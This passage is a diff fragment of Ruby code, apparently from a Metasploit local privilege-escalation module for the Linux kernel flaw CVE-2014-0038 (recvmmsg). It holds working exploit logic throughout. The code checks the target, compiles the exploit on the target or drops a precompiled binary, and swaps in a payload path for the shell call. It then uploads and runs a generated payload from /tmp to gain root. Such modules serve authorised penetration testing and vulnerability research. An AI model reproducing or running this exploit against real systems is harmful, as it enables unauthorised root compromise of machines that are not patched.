+    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+      if has_prereqs?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    def upload_and_chmod(fname,fcontent)
+      print_status "Writing to #{fname} (#{fcontent.size} bytes)"
+      rm_f fname
+      write_file(fname, fcontent)
+      cmd_exec("chmod +x #{fname}")
+      register_file_for_cleanup(fname)
+    end
+
+    if compile
+      recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
+                          "system(\"#{payload_path}\");")
+      upload_and_chmod("#{executable_path}.c", recvmmsg)
+      vprint_status("Compiling #{executable_path}.c")
+      cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
+      register_file_for_cleanup(executable_path)
+    else
+      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
+      fd = ::File.open( path, "rb")
+      recvmmsg = fd.read(fd.stat.size)
+      fd.close
+      upload_and_chmod(executable_path, recvmmsg)
+      # overwrite with the hardcoded variable names in the compiled versions
+      payload_filename = 'a0RwAacU'
+      payload_path = "/tmp/#{payload_filename}"
+    end
+
+    upload_and_chmod(payload_path, generate_payload_exe)
+    stime = Time.now
+    vprint_status("Exploiting... May take 17min.  Start time: #{stime}")
+    output = cmd_exec(executable_path)
+    output.each_line { |line| vprint_status(line.chomp) }
+  end
+end